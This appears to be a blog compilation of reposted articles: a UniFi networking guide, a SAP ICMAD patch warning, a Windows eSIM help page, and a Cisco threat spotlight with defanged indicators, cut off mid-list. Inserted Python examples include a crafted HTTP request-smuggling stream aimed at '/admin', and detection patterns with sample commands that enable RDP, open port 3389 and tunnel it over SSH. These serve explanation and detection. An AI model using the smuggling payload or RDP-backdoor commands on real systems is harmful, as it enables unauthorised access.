Blog

How to set up the ultimate Ubiquiti UniFi home network in 2022

If you’re in the market for a new Wi-Fi 6 router, the best of them deliver reliable coverage to every corner of your home at a modest starting cost. If you need extensibility, mesh routers let you add nodes. But if you want extensive configuration options and an all-in-one solution covering routing, switching, and home security, consider Ubiquiti’s portfolio. Its UniFi brand covers switches and routers aimed at small businesses, but over the last two years it has turned its attention to the consumer category with a decent selection of products. Ubiquiti also offers a range of security cameras and video doorbells under UniFi Protect, which integrate easily into a UniFi network. The best part about Ubiquiti’s home security products is that they record footage locally and don’t send data to a cloud service, which gives you better privacy and spares you a monthly subscription to unlock the full camera and doorbell feature set. So if you’re looking to overhaul your home network, here’s what Ubiquiti has to offer.

All-in-one solution: UniFi Dream Router

Image: Ubiquiti UniFi Dream Machine review (Source: Harish Jonnalagadda / Android Central)

If you don’t want to buy a standalone wired router, a switch, and wireless access points separately, take a look at Ubiquiti’s unified solutions. The latest is the UniFi Dream Router, and it goes up against the best Wi-Fi 6 routers. It’s the second all-in-one device in the UniFi range, after the Wi-Fi 5-based UniFi Dream Machine, and the feature set you get is astounding for the price.

But first, a rundown of the hardware: the Dream Router has a cylindrical design similar to the Dream Machine, but a tiny screen at the front shows real-time network statistics. The router has 4×4 MIMO and goes up to 2.4Gbps with Wi-Fi 6, and it utilizes 160MHz channels. There’s a dual-core CPU, 128GB of storage, an SD card slot, 2GB of RAM, and four Ethernet ports with two offering PoE.

Because it is a UniFi product, the Dream Router has an exhaustive set of configuration options that far exceed those of most consumer routers. For example, it can adopt and manage Ubiquiti’s security cameras and video doorbells. It is relatively straightforward to set up from your phone, and if you don’t want to tweak every setting, that’s fine: the options are there should you need them.

Now, there are a few caveats. First, the Dream Router is still in testing and isn’t finalized, so you can only buy it from Ubiquiti’s Early Access store. You’ll have to make a free account to access the store, and while it is often sold out, it is restocked regularly. The Dream Router sells out so quickly because of its price: $79.

For under $100, no other router comes close to the Dream Router’s feature set, and with the router expected to cost considerably more once it reaches regular retail channels, now is the best time to pick it up.

UniFi Dream Router

With 4×4 MIMO and 2.4Gbps bandwidth over Wi-Fi 6, four Gigabit Ethernet ports with two PoE ports, and a screen at the front for monitoring real-time traffic, the Dream Router is the ultimate value.

Routing: UniFi Dream Machine Pro

Image: Ubiquiti UniFi Dream Machine Pro review (Source: Harish Jonnalagadda / Android Central)

If you want to use a standalone router for managing your home network, you should take a look at the UniFi Dream Machine Pro (UDM Pro). I switched to the UDM Pro last year, and it has been a revelation. However, unlike the Dream Machine or Dream Router, the UDM Pro is a 1U rack-mounted solution, so you will need a server rack if you want to go down this route.

The UDM Pro is designed to be a wired router, so you’ll have to buy a switch and a wireless AP to connect your wireless devices like phones, tablets, and notebooks. Now, the standout feature with the UDM Pro is that it has a 3.5-inch HDD slot to facilitate network video recording (NVR), so if you want to add Ubiquiti’s security cameras to your network, this is the ideal way to go. In addition, you can slot in a 4TB drive in the UDM Pro and access locally-stored recordings going back weeks and months.

As for hardware, the UDM Pro has a built-in eight-port Gigabit switch with a 1GbE backplane, two 10Gbps SFP+ ports (one WAN, one LAN), and a quad-core CPU with Cortex-A57 cores. It includes the full suite of UniFi OS applications: UniFi Network for routing and switching, UniFi Protect for security cameras, UniFi Talk for VoIP, and UniFi Access for managing door access in a small office environment. The UDM Pro also offers intrusion detection and prevention (IDS/IPS) and can block connections to known-malicious sites.

Having used the UDM Pro extensively for the last year, the only downside I can think of is that it lacks built-in PoE ports. So when you’re connecting Ubiquiti’s wireless access points, you will need to buy an additional PoE injector.

UniFi Dream Machine Pro

The UDM Pro sits at the heart of a prosumer UniFi install. The rack-mounted router comes with an 8-port switch and 10G SFP+ ports, a 3.5-inch drive tray to use as a network video recorder, and class-leading threat management features.

Switching: UniFi Switch 24 PoE

Image: Ubiquiti UniFi Dream Machine Pro review (Source: Harish Jonnalagadda / Android Central)

While I have over 30 devices connected to the wireless access points in my home at any given time, I use wired connectivity for the devices that I use the most, including the work machines, TVs, and the PS5. So while the UDM Pro has an eight-port switch, I find that a 24-port option is the best way to go, particularly if you’re going to connect a lot of security cameras. For context, I’m currently using over a dozen ports on my Switch Pro 24 PoE.

As for the switch, the Switch Pro 24 PoE is a fantastic choice, but at $699, it is also very costly. My recommendation would be the standard Switch 24 PoE; it is a 24-port switch with 16 Gigabit PoE+ ports with a total power budget of 95W alongside eight Gigabit ports. Like the UDM Pro, it is a 1U rack-mountable solution, and you get a small screen on the left for viewing real-time statistics.

The 95W power budget is more than adequate for the wireless access points and security cameras, and at $379, the Switch 24 PoE costs nearly half as much as the Pro version, and while you miss out on 10Gbps SFP+ ports, it has most of the essentials covered. If you don’t want a rack-mounted solution, you should look at the Switch Lite 16 PoE, a 16-port switch with eight PoE+ ports.

UniFi Switch 24 PoE

If you need more ports for wired connections, the Switch 24 PoE is the ideal option. It has 16 802.3at PoE ports with a cumulative power budget of 95W and can easily accommodate a slate of wireless access points and security cameras.

Wireless: UniFi Access Point Wi-Fi 6 Lite

Image: UniFi Access Point Wi-Fi 6 (Source: Ubiquiti)

With a wired router and switch sorted out, you’ll need a wireless access point so wireless devices like phones and tablets can connect to your home network. Ubiquiti has three options in this area: Wi-Fi 6 Lite, 6 Pro, and 6 Long Range. As the name suggests, all three are based on Wi-Fi 6, and they share a similar design.

These APs work best when mounted on the ceiling or the wall as the antennae are positioned sideways. The $99 Wi-Fi 6 Lite has 2×2 MIMO and goes up to 1.2Gbps on the 5GHz band, with a gain of 3dBi. The $149 Wi-Fi 6 Pro and $179 Wi-Fi 6 Long Range have IP54 ratings, draw power using the 802.3at PoE+ standard, and are designed for indoor and outdoor use.

The Wi-Fi 6 Pro is the newer offering and comes with higher-gain antennas of up to 6dBi and a maximum 5GHz throughput of 4.8Gbps, while the Long Range goes up to 5.5dBi and 2.4Gbps over 5GHz. The Wi-Fi 6 Pro is also the only access point in Ubiquiti’s portfolio that supports 160MHz channels.

I use a Wi-Fi 6 Long Range and Wi-Fi 6 Lite in my home, but if you’re starting from scratch, a good bet would be to get a Wi-Fi 6 Lite and Wi-Fi 6 Pro to begin with and add more as needed. These access points integrate seamlessly into the UniFi network and are adopted and configured from the UDM Pro.

UniFi Access Point Wi-Fi 6 Lite

The Wi-Fi 6 Lite access point has 2×2 MIMO and 1.2Gbps throughput over 5GHz, and it does a good job delivering reliable Wi-Fi 6 signal to all corners of your home.

UniFi Access Point Wi-Fi 6 Pro

Ubiquiti’s latest wireless access point has it all: 160MHz channels over Wi-Fi 6, 4×4 MIMO with 4.8Gbps throughput at 5GHz, and support for up to 300 clients.

Security camera and doorbell: G4 series

Image: UniFi Protect series (Source: Ubiquiti)

Security cameras are a big part of the UniFi Protect portfolio, and Ubiquiti offers a dozen products in this area. I use a combination of the G3 Flex, G4 Bullet, and the G4 Dome inside (and outside) my home, and they’re pretty good at what they do. Ubiquiti’s cameras draw power over PoE and record at 1080p or higher, and the G4 series adds weather resistance.

In my use case, I found the G3 Flex to be ideal as an indoor camera as it can be positioned just about anywhere inside the house, with the G4 Bullet and G4 Dome suited for outdoor use. The G3 Flex starts at $79, and you can pick up a pack of three for $229.

The $199 G4 Bullet offers 1440p recording, and if you want 4K video, a 3x optical zoom lens, and an IP67 rating, you will need the $449 G4 Pro. Several users had issues with condensation on the G4 Bullet last year, but that hasn’t been a drawback for me. I haven’t used Ubiquiti’s doorbells just yet. Still, the G4 Doorbell offers a similar set of features to other smart video doorbells, including two-way audio, motion detection, and Wi-Fi connectivity. Here’s a breakdown of the feature set that each security camera offers:

Image: UniFi Protect series feature breakdown (Source: Ubiquiti)

You can pair the security cameras and doorbells with any UniFi console that runs UniFi Protect. As for managing the security devices, you can install the UniFi Protect app on your phone and configure motion detection zones, privacy zones where the cameras won’t record footage, and smart detection for people and vehicles.

You get a decent number of options for notifications, including the ability to set custom schedules and receive information at a set time. The cameras do a good job with motion detection and notification alerts, and UniFi Protect has a good UI that lets you view events and see recorded footage with ease. The best part is that all footage is stored locally, so you don’t have to pay a license fee to access all the features on offer. Unfortunately, there’s no active monitoring like you get with Arlo or Ring, but UniFi Protect gets a lot right for a self-hosted solution.

UniFi Camera G3 Flex

The G3 Flex is a great indoor camera, thanks to its versatile design. You get 1080p video recording, integrated IR LEDs for night vision, and a built-in mic.

UniFi Camera G4 Bullet

The G4 Bullet has 1440p recording, a weather-sealed design, a built-in mic, a 110-degree angle of view, and LEDs for recording at night.

Building your UniFi network

Image: Ubiquiti UniFi Dream Machine Pro review (Source: Harish Jonnalagadda / Android Central)

Ubiquiti has significantly expanded its consumer offerings in the last two years, and if you’re interested in getting started with a UniFi home network, you have a lot of choices. The UDM Pro is ideally suited as a routing solution because of the hardware on offer and its extensive feature set and configuration options, and you can pair it with a multitude of switches and wireless access points.

The reason why I switched to UniFi was the extensibility. I started with the UDM Pro, Switch Pro 24 PoE, and the Wi-Fi 6 Long Range and Wi-Fi 6 Lite for wireless access. As for security cameras, I have three units of the G3 Flex for indoor use and a G4 Bullet located outside.

I’m now eyeing the Wi-Fi 6 Pro for the balcony as that’s the one area where I don’t get adequate coverage, and the G4 Doorbell as the video doorbell. I’ve deliberated getting a Nest Doorbell, but considering I have a UniFi Protect system set up anyway, I figured the G4 Doorbell would be a better alternative.

The biggest issue with Ubiquiti products is availability. The security cameras, in particular, are constantly sold out, so you will have to wait for a restock to get your hands on the G4 Bullet or even the Dream Router. Then you’ll need to factor in cabling as most of these devices connect over Ethernet. I’m fortunate that my home has internal Cat5 cabling, but you will need to consider that if you’re looking to make the switch.

The sheer amount of features in UniFi Network, the ease-of-use of UniFi Protect, and the fact that you have complete control over the recorded footage make Ubiquiti’s products an excellent choice for prosumers. Of course, building out the entire network is a sizeable investment if you’re picking up a UDM Pro, Switch 24 PoE, two APs, and a few security cameras, but at the end of the day, you get a scalable network that will serve you well for several years.

Source :
https://www.androidcentral.com/how-set-ultimate-ubiquiti-unifi-home-network-2022

CISA warns admins to patch maximum severity SAP vulnerability

The US Cybersecurity and Infrastructure Security Agency (CISA) has warned admins to patch a set of severe security flaws dubbed ICMAD (Internet Communication Manager Advanced Desync) and impacting SAP business apps using Internet Communication Manager (ICM).

CISA added that failing to patch these vulnerabilities exposes organizations with vulnerable servers to data theft, financial fraud risks, disruptions of mission-critical business processes, ransomware attacks, and a halt of all operations.

ICMAD bugs affect most SAP products

Yesterday, Onapsis Research Labs, which found and reported CVE-2022-22536 (the one of the three ICMAD bugs rated as maximum severity), also cautioned SAP customers to patch immediately. The other two are tracked as CVE-2022-22532 and CVE-2022-22533.

The SAP Product Security Response Team (PSRT) worked with Onapsis to create security patches to address these vulnerabilities and released them on February 8, during this month’s Patch Tuesday.

If successfully exploited, the ICMAD bugs allow attackers to target SAP users, business information, and processes, and steal credentials, trigger denials of service, execute code remotely and, ultimately, fully compromise any unpatched SAP applications.

“The ICM is one of the most important components of an SAP NetWeaver application server: It is present in most SAP products and is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet,” Onapsis explained.

“Malicious actors can easily leverage the most critical vulnerability (CVSSv3 10.0) in unprotected systems; the exploit is simple, requires no previous authentication, no preconditions are necessary, and the payload can be sent through HTTP(S), the most widely used network service to access SAP applications.”
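The ICMAD bugs are, as the name says, desync (request smuggling) issues in ICM’s HTTP handling. The article does not describe the trigger, and the toy below does not reproduce it; it is an added example, not code from the article, SAP, Onapsis or CISA, showing the bug class in general. Two HTTP parsers that frame a request body differently (one trusting Content-Length, one honouring a chunked Transfer-Encoding) split the same connection bytes into different requests, so a request the front end never saw reaches the back end; the strict parser at the end rejects ambiguous framing, which is the shape of the remediation rather than SAP’s actual patch. The byte stream is constructed for the example.

```python
"""Toy HTTP request desync (request smuggling) and a strict parser that refuses it.

Added example; not code from the article, SAP, Onapsis or CISA, and not the ICMAD
trigger itself. The byte streams below are constructed.
"""
from typing import Callable, List, Optional, Tuple

Headers = List[Tuple[str, str]]


def parse_head(stream: bytes) -> Tuple[str, Headers, bytes]:
    """Split off one request head: (request line, lower-cased headers, remaining bytes)."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, rest


def chunked_body_length(data: bytes) -> int:
    """Bytes consumed by a chunked body up to and including the terminating 0-chunk."""
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)  # chunk extensions are ignored
        pos = eol + 2
        if size == 0:
            return pos + 2  # the CRLF after the last chunk (no trailers assumed)
        pos += size + 2


def framing_content_length(headers: Headers, body: bytes) -> int:
    """Naive parser: Content-Length wins, Transfer-Encoding is ignored."""
    for name, value in headers:
        if name == "content-length":
            return int(value)
    return 0


def framing_transfer_encoding(headers: Headers, body: bytes) -> int:
    """RFC 7230 precedence: a chunked Transfer-Encoding overrides Content-Length."""
    if any(n == "transfer-encoding" and "chunked" in v.lower() for n, v in headers):
        return chunked_body_length(body)
    return framing_content_length(headers, body)


def framing_strict(headers: Headers, body: bytes) -> int:
    """Hardened parser: refuse any request whose body length is ambiguous."""
    cls = [v for n, v in headers if n == "content-length"]
    tes = [v for n, v in headers if n == "transfer-encoding"]
    if cls and tes:
        raise ValueError("both Content-Length and Transfer-Encoding present")
    if len(set(cls)) > 1:
        raise ValueError("conflicting Content-Length values")
    if any(not v.isdigit() for v in cls):
        raise ValueError("malformed Content-Length")
    if tes:
        if tes[-1].lower() != "chunked":
            raise ValueError("unsupported transfer coding")
        return chunked_body_length(body)
    return int(cls[0]) if cls else 0


def split_requests(stream: bytes, framing: Callable[[Headers, bytes], int]) -> List[str]:
    """Request lines a parser using `framing` extracts from one connection's bytes."""
    seen = []
    while stream:
        request_line, headers, rest = parse_head(stream)
        seen.append(request_line)
        stream = rest[framing(headers, rest):]
    return seen


def rejection_reason(stream: bytes) -> Optional[str]:
    """Why the strict parser refuses a stream, or None if its framing is unambiguous."""
    try:
        split_requests(stream, framing_strict)
    except ValueError as exc:
        return str(exc)
    return None


# Constructed CL.TE stream: a front end trusting Content-Length forwards all 39 body bytes
# as one request; a back end honouring chunked encoding ends the body at "0\r\n\r\n" and
# treats the remaining 34 bytes as a second, smuggled request.
SMUGGLED = (
    b"POST / HTTP/1.1\r\nHost: app\r\nContent-Length: 39\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"0\r\n\r\n"
    b"GET /admin HTTP/1.1\r\nHost: app\r\n\r\n"
)
BENIGN = b"POST / HTTP/1.1\r\nHost: app\r\nContent-Length: 5\r\n\r\nhello"

if __name__ == "__main__":
    print("Content-Length view   :", split_requests(SMUGGLED, framing_content_length))
    print("Transfer-Encoding view:", split_requests(SMUGGLED, framing_transfer_encoding))
    print("strict parser         :", rejection_reason(SMUGGLED))
```

The two views of SMUGGLED differ by exactly one request (GET /admin), which is the whole point of a desync: whatever access control the front end applied was applied to the POST only. The strict parser trades a little compatibility for an unambiguous answer, which is the right trade for any component that sits in front of business logic.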

No SAP customers breached using ICMAD exploits so far

SAP’s Director of Security Response Vic Chung said they’re currently not aware of any customers’ networks breached using exploits targeting these vulnerabilities and “strongly” advised all impacted organizations to immediately apply patches “as soon as possible.”

SAP customers can use an open-source tool developed by Onapsis security researchers to scan their systems for the ICMAD vulnerabilities.

The German business software developer also patched other maximum severity vulnerabilities associated with the Apache Log4j 2 component used in SAP Commerce, SAP Data Intelligence 3 (on-premise), SAP Dynamic Authorization Management, Internet of Things Edge Platform, and SAP Customer Checkout.

All of them allow remote threat actors to execute code on systems running unpatched software following successful exploitation.

Source :
https://www.bleepingcomputer.com/news/security/cisa-warns-admins-to-patch-maximum-severity-sap-vulnerability/

Use an eSIM to get a cellular data connection on your Windows PC

Windows 10 and Windows 11
An eSIM lets you connect to the Internet over a cellular data connection. With an eSIM, you don’t need to get a SIM card from your mobile operator, and you can quickly switch between mobile operators and data plans.

For example, you might have one cellular data plan for work, and a different plan with another mobile operator for personal use. If you travel, you can get connected in more places by finding mobile operators with plans in that area.

Here’s what you’ll need:

  • A PC running Windows 10, Version 1703 or later. To see which version of Windows 10 your device uses, select the Start button, then select Settings > System > About.
  • A PC with an eSIM in it. Here’s how you can tell if your PC has an eSIM:
    1. Select the Start button, then select Settings > Network & Internet > Cellular.
    2. On the Cellular screen, look for a link near the bottom of the page that says Manage eSIM profiles. If that link appears, your PC has an eSIM.

Note: Some devices have both an eSIM and physical SIM card. If you don’t see Manage eSIM profiles but you do see Use this SIM for cellular data at the top of the Cellular settings screen, select the other SIM from the drop-down box, and then see if the Manage eSIM profiles link appears.

To add an eSIM profile

You’ll need to add an eSIM profile to get an Internet connection using cellular data.

If you have a PC from your organization, an eSIM profile might already be added to your PC. If you select Manage eSIM profiles and see an eSIM profile for a mobile operator you expect to find, you can skip this procedure and go to the next one to get connected.

  1. Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
  2. Under eSIM profiles, select Add a new profile.
  3. To search for available profiles or use an activation code you have from your mobile operator, do one of the following:
    • Search for available profiles
      1. Select Search for available profiles > Next.
      2. When a profile you want to use is found, select Download.
      3. Enter the confirmation code from your mobile operator in the corresponding box, then select Download.
      4. After the profile is downloaded and installed, select Continue to find other profiles you might want and then repeat the previous steps.
      5. Select Close when you have downloaded the profiles you want.
    • Use an activation code you have from your mobile operator
      1. Select Let me enter an activation code I have from my mobile operator > Next.
      2. If you have a QR code to scan for the activation code, choose which camera to use on your PC, and then scan the QR code.
      3. The activation code should appear in the corresponding Activation code box. Select Next.
      4. For the dialog box that asks Do you want to download this profile?, enter the confirmation code from your mobile operator into the corresponding box, and then select Download.
      5. Select Close.
  4. Optional: To give the profile a friendly name (for example, Work or Personal) to help you remember it, select the profile, select Edit name, type a name you’ll remember, and then select Save.

To connect to cellular data using an eSIM profile

  1. Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile you want, and then select Use.
  3. Select Yes for This will use cellular data from your data plan and may incur charges. Do you want to continue?
    You’ll be connected to a cellular data network and ready to go.

To switch between profiles

If you have more than one profile installed on your PC, you can switch between profiles to use a different mobile operator and data plan.

  1. Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile you want to stop using, and then select Stop using.
  3. Select Yes for You’ll be disconnected from this cellular network. Continue?
  4. Select the different profile you want to use, then select Use.

To delete a profile

If you don’t want to use a profile anymore, you can delete it from your PC. If you delete the profile and want to add it again later, you’ll need to download the profile again and might need to contact your mobile operator.

  1. Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile to delete, and then select Delete.
  3. At the prompt that warns you that the profile will be permanently deleted, select Yes.

Note: If you have a PC from your organization, you might not be able to delete an eSIM profile because of a policy that’s set by your organization.

Source :
https://support.microsoft.com/en-us/windows/use-an-esim-to-get-a-cellular-data-connection-on-your-windows-pc-0e255714-f8be-b9ef-9e84-f75b05ed98a3#WindowsVersion=Windows_10

Cybersecurity Threat Spotlight: Emotet, RedLine Stealer, and Magnat Backdoor

Security and IT teams may be fresh off their holiday breaks, but threat actors have kept busy over the last month. In this edition of the Cybersecurity Threat Spotlight, we’re highlighting the Trojans, loaders, information stealers, and backdoors that we’re seeing online.

Want to learn more about how Cisco Umbrella can defend your enterprise against these threats? Request a personalized demo today!


Threat Name: Emotet

Threat Type: Trojan/Loader

Attack Chain:

A graphic showing the attack chain for Emotet: Malspam to Weaponized Document/Archive to Malicious Macros to Emotet Loader to CobaltStrike to Conti Ransomware. The graphic indicates that Cisco Umbrella protects users against Weaponized Document/Archive, Emotet Loader, and Cobalt Strike.

Description: Emotet is a banking Trojan that was first detected in 2014. It has since evolved into a massive botnet that sends large volumes of malspam with malicious document attachments leading to the Emotet Trojan. The Trojan also functions as a dropper for second-stage payloads, including (but not limited to) TrickBot, Qakbot, and Ryuk. Emotet can steal SMTP credentials and email content, and the threat actors reply to legitimate conversations in a victim’s mailbox, injecting replies that carry malicious attachments.

Emotet Spotlight: In November, security researchers observed the return of the Emotet loader, which had been inactive since January 2021 after a law enforcement takedown. Emotet is a loader botnet that uses a Loader-as-a-Service model. Emotet’s main advantage is its modular system, which enables a highly targeted approach based on the requirements of the delivered payload. Unfortunately, the botnet has historically been leveraged by adversaries conducting sophisticated ransomware attacks.

Security researchers now observe strong connections between Emotet and Conti ransomware, which suggests the two cybercriminal syndicates are establishing, or have already established, a partnership. Historically, Conti has relied on sustainable, repeatable methods of operation, and Emotet has proven able to provide initial access and a strong foothold in many corporate networks. This pairing could set the pattern for other adversaries and will likely have a major impact on the threat landscape in 2022.

Target Geolocations: Worldwide
Target Data: User Credentials, Browser Data, Sensitive Information
Target Businesses: Any
Exploits: N/A

MITRE ATT&CK for Emotet

Initial Access:
Phishing: Spearphishing Attachment or Spearphishing Link, Valid Accounts: Local Accounts
Discovery:
Account Discovery
Process Discovery
Persistence:
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Create or Modify System Process: Windows Service
Scheduled Task/Job: Scheduled Task
Execution:
Command and Scripting Interpreter: PowerShell, Windows Command Shell, Visual Basic
User Execution: Malicious Link, Malicious File
Windows Management Instrumentation
Evasion:
Obfuscated Files or Information
Software Packing
Collection:
Archive Collected Data
Email Collection: Local Email Collection
Credential Access:
Brute Force: Password Guessing
Credentials From Password Stores: Credentials from Web Browsers
Network Sniffing
OS Credential Dumping: LSASS Memory
Unsecured Credentials: Credentials In Files
Command and Control:
Encrypted Channel: Asymmetric Cryptography, Non-Standard Port
Exfiltration:
Exfiltration Over C2 Channel
Lateral Movement:
Exploitation of Remote Services
Remote Services: SMB/Windows Admin Shares
Privilege Escalation:
Process Injection: Dynamic-Link Library Injection

IOCs:

Domains (Active)

cars-taxonomy[.]mywebartist[.]eu
crownadvertising[.]ca
giadinhviet[.]com
hpoglobalconsulting[.]com
immoinvest[.]com[.]br
itomsystem[.]in
pasionportufuturo[.]pe
thetrendskill[.]com
visteme[.]mx
cursossemana[.]com
callswayroofco[.]com
dipingwang[.]com
yougandan[.]com

Domains (Historical)

adorwelding[.]zmotpro[.]com
alfadandoinc[.]com
alfaofarms[.]com
av-quiz[.]tk
ceshidizhi[.]xyz
ckfoods[.]netdevanture[.]com[.]sg
evgeniys[.]ru
goodtech[.]cetxlabs[.]com
html[.]gugame[.]net
huskysb[.]com
im2020[.]vip
jamaateislami[.]com
laptopinpakistan[.]com
linebot[.]gugame[.]net
lpj917[.]com
manak[.]edunetfoundation[.]org
newsmag[.]danielolayinkas[.]com
onlinemanager[.]site
parentingkiss[.]com
pibita[.]net
primtalent[.]com
protracologistics[.]com
ranvipclub[.]net
ridcyf[.]com
server[.]zmotpro[.]com
staviancjs[.]com
team[.]stagingapps[.]xyz
thepilatesstudionj[.]com
vcilimitado[.]com
vegandietary[.]com
voltaicplasma[.]com
www[.]168801[.]xyz
www[.]caboturnup[.]com
xanthelasmaremoval[.]com
yoho[.]love

IPs (Active)

151[.]80[.]142[.]33
87[.]248[.]77[.]159
159[.]65[.]76[.]245

IPs (Historical)

105[.]247[.]100[.]215
118[.]244[.]214[.]210
120[.]150[.]206[.]156
12[.]57[.]239[.]19
139[.]162[.]157[.]8
139[.]59[.]242[.]76
169[.]64[.]242[.]153
173[.]90[.]152[.]220
179[.]52[.]236[.]96
181[.]119[.]30[.]35
181[.]229[.]155[.]11
185[.]129[.]3[.]211
185[.]97[.]32[.]6
186[.]176[.]182[.]192
186[.]4[.]234[.]27
189[.]130[.]50[.]85
189[.]234[.]165[.]149
190[.]128[.]27[.]233
200[.]27[.]55[.]100
200[.]56[.]104[.]44
208[.]180[.]149[.]228
208[.]180[.]246[.]147
216[.]176[.]21[.]143
216[.]251[.]1[.]1
23[.]254[.]203[.]51
24[.]206[.]17[.]102
37[.]120[.]175[.]15
45[.]123[.]3[.]54
50[.]100[.]215[.]149
50[.]125[.]99[.]70
51[.]75[.]168[.]89
54[.]39[.]176[.]22
54[.]39[.]181[.]130
67[.]215[.]49[.]234
67[.]43[.]253[.]189
86[.]98[.]71[.]86
92[.]207[.]145[.]74
96[.]246[.]206[.]16

Additional Information:

Back from the dead: Emotet re-emerges, begins rebuilding to wrap up 2021
Corporate Loader “Emotet”: History of “X” Project Return for Ransomware

Which Cisco Products Can Block:

Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance


Threat Name: RedLine Stealer

Threat Type: Information Stealer

Attack Chain:

A graphic showing the attack chain for RedLine Stealer: Malspam Link/Trojanized App Download to RedLine Malware to Information Stealing to Command and Control. The graphic indicates that Cisco Umbrella protects against Malspam Link/Trojanized App Download, RedLine Malware, and Command and Control.

Description: RedLine is an information stealer sold as Malware-as-a-Service (MaaS) on Russian underground forums. It steals login credentials, autocomplete data, passwords, and credit card information from browsers. It also collects information about the user and their system, such as the username, location, hardware configuration, and installed security software. A recent update also adds the ability to steal cryptocurrency cold wallets. RedLine appears to be under active development, with new features introduced frequently.

RedLine Spotlight: Security researchers found that most of the stolen credentials currently sold on dark web underground markets were collected with RedLine Stealer. RedLine attempts to harvest browser data (passwords, cryptocurrency wallets, and VPN service credentials) and system information (hardware configuration and location). Over the past year it has gained new features: it can now load other malware and run commands while periodically sending updates with newly collected information from the infected host to its C2. The main goal of cybercrime campaigns using RedLine Stealer appears to be the sale of stolen data to other cybercriminals, who weaponize it in their own attacks.

Target Geolocations: Any
Target Data: User Credentials, Browser Data, Financial and Personal Information, Cryptocurrency Wallets
Target Businesses: Any
Exploits: N/A

MITRE ATT&CK for RedLine

Initial Access:
Phishing
Trojanized Applications
Credential Access:
Credentials from Password Stores
Steal Web Session Cookie
Unsecured Credentials
Credentials from Password Stores: Credentials from Web Browsers
Discovery:
Account Discovery
Software Discovery
Process Discovery
System Time Discovery
System Service Discovery
System Location Discovery
Peripheral Device Discovery
Persistence:
Registry Run Keys/Startup Folder
Scheduled Task/Job: Scheduled Task
Execution:
User Execution
Command and Scripting Interpreter: PowerShell
Evasion:
Impair Defenses: Disable or Modify Tools
Collection:
Screen Capture
Command and Control:
Non-Standard Port
Non-Application Layer Protocol
Exfiltration:
Exfiltration Over C2 Channel

IOCs

Domains (Historical)

userauto[.]space
22231jssdszs[.]fun
hssubnsx[.]xyz
dshdh377dsj[.]fun

IPs (Active)

185[.]215[.]113[.]114

IPs (Historical)

37[.]0[.]8[.]88
193[.]142[.]59[.]119
136[.]144[.]41[.]201

Additional Information

RedLine Stealer identified as primary source of stolen credentials on two dark web markets
Redline Stealer
Shining a Light on RedLine Stealer Malware and Identity Data Found in Criminal Shops

Which Cisco Products Can Block:
Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance


Threat Name: Magnat Backdoor

Threat Type: BackDoor

Attack Chain:[1]

Graphic showing the attack chain for Magnat Backdoor: Malvertising to Download Fake Installer to De-Obfuscation to RDP Backdoor/Information Stealer/Chrome Extension Installer to Command and Control. The graphic indicates that Umbrella protects users against Malvertising, Download Fake Installer, RDP Backdoor/Information Stealer, and Command and Control.

Description: Magnat Backdoor is an AutoIt-based installer that prepares a system for Microsoft Remote Desktop access and forwards the RDP service port over an outbound SSH tunnel, paving the way for the attacker to reach the system remotely via RDP. It does this by setting up a scheduled task that periodically contacts a C2 server and establishes the tunnel when instructed by the C2 response.
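A hunt heuristic for the behaviour described above, as an added example that is not code from Cisco Talos or the Umbrella post. The post says the installer prepares the host for RDP, modifies the system firewall (per the ATT&CK mapping for this threat), creates a scheduled task, and tunnels RDP out over SSH, but gives no command lines. The patterns below (reg.exe clearing fDenyTSConnections, netsh opening TCP 3389, schtasks /create, an ssh -R reverse forward whose target is 127.0.0.1:3389) are the standard Windows ways of doing those things and are my assumptions about what such activity looks like in process telemetry, not Magnat’s actual commands. The events are constructed in the shape of Sysmon Event ID 1 fields.

```python
"""Hunt heuristic for RDP-backdoor staging: RDP switched on, firewall opened, task created,
local 3389 reverse-forwarded over SSH.

Added example; not code from Cisco Talos or the Umbrella post. The patterns are assumptions
about what this activity usually looks like, not Magnat's commands. Events are constructed.
"""
import re
from typing import Dict, List, Tuple

RULES = [
    # reg.exe setting fDenyTSConnections to 0 switches Remote Desktop on
    ("rdp_enabled_via_registry", re.compile(r"fDenyTSConnections.*\s/d\s+0\b", re.I)),
    # netsh allowing inbound TCP 3389 (or the built-in Remote Desktop rule group)
    ("firewall_opened_for_rdp", re.compile(r"advfirewall.*(localport=3389\b|remote desktop)", re.I)),
    # ssh/plink reverse forward (-R) whose target is the local RDP port: RDP becomes
    # reachable through the attacker's SSH server without any inbound connection
    ("rdp_reverse_ssh_tunnel",
     re.compile(r"\b(ssh|plink)(\.exe)?\b.*\s-R\s*\S*?:?(127\.0\.0\.1|localhost):3389\b", re.I)),
    # schtasks creating a task: the periodic C2 check-in the post describes needs persistence
    ("scheduled_task_created", re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I)),
]

# Constructed process-creation events (not real telemetry); 203.0.113.7 is a documentation address.
EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\setup_autoit.exe"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="rdp" dir=in action=allow protocol=TCP localport=3389',
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\setup_autoit.exe"},
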